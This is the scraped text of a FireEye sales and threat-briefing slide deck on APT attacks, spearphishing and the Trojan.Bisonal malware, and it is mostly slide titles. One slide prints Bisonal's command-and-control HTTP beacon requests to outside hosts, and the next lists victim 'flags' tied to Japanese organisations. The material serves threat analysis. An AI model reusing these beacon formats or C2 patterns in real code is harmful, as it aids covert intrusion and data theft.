Post on 29-Mar-2015
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1
Stopping Next-Gen Threats
Dan Walters – Sr. Systems Engineer Mgr.
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 2
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 3
"We're moving towards a world where every attack is effectively zero-day… having a signatured piece of malware, that shouldn't be the foundation on which any security model works." - Chris Young, GVP Cisco Security
Tech Week Europe, September 28th 2012
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 4
High Profile APT Attacks Are Increasingly Common
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 5
The Attack Lifecycle – Multiple Stages
Exploitation of system1
3 Callbacks and control established
2 Malware binary download
CompromisedWeb server, or
Web 2.0 site
1Callback Server
IPS
32DMZ
File Share 2
File Share 1
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 6
Crimeware == for the $
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 7
Advanced Persistent Threat == Human
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 8
This is Alex == FireEye Research
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 9
The Usual Suspects
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 10
Organized…Persistent…
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 11
Reconnaissance made easy…
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 12
The Exploit
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 13
LaserMotive
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 14
CEOs are targeted
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 15
Could you stop this?
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 16
The Callback
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 17
Hidden in plain view…
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 18
Blog Post?
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 19
RSS Feed?
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 20
We’re Only Human
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 21
HR make for easy targets
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 22
Just doing my job…
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 23
NATO is a frequent spearphish target
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 24
Global Unrest
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 25
Who’s Oil is it?
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 26
The curious case of Trojan.Bisonal
• Targets 100% Japanese organizations
• Delivered via weaponized doc/xls files
• Embeds the target name into the command and control traffic
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 27
Custom “Flag” and c2 domain
GET /j/news.asp?id=* HTTP/1.1
User-Agent: flag:khi host:Business IP:10.0.0.43 OS:XPSP3 vm: proxy: �� ��Host: online.cleansite.us Cache-Control: no-cache
GET /a.asp?id=* HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0;.NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: khi.acmetoy.com Connection: Keep-Alive
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 28
Other “Flag”s seen
• flag:410maff <-- ministry of agriculture, forestry, and fisheries• flag:1223• Flag:712mhi <-- mitsubishi heavy industries• Flag:727x• Flag:8080• Flag:84d• flag:boat• Flag:d2• Flag:dick• flag:jsexe• flag:jyt• Flag:m615• flag:toray• Flag:MARK 1• flag:nec01 <-- nec corporation• Flag:qqq• flag:nids <-- national institute for defense studies (nids.go.jp)• flag:nsc516 <-- nippon steel corp• flag:ihi <-- ihi corp
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 29
China is not the only threat
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 30
Multi-Protocol, Real-Time VX Engine
PHASE 1Multi-Protocol Object Capture
PHASE 2Virtual Execution Environments
PHASE 1: WEB MPS• Aggressive Capture• Web Object Filter
DYNAMIC, REAL-TIME ANALYSIS
• Exploit detection
• Malware binary analysis
• Cross-matrix of OS/apps
• Originating URL
• Subsequent URLs
• OS modification report
• C&C protocol descriptors
Map to TargetOS and
Applications
PHASE 1: E-MAIL MPS• Email Attachments• URL Analysis
Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 31
Thank You!
FireEye - Modern Malware Protection System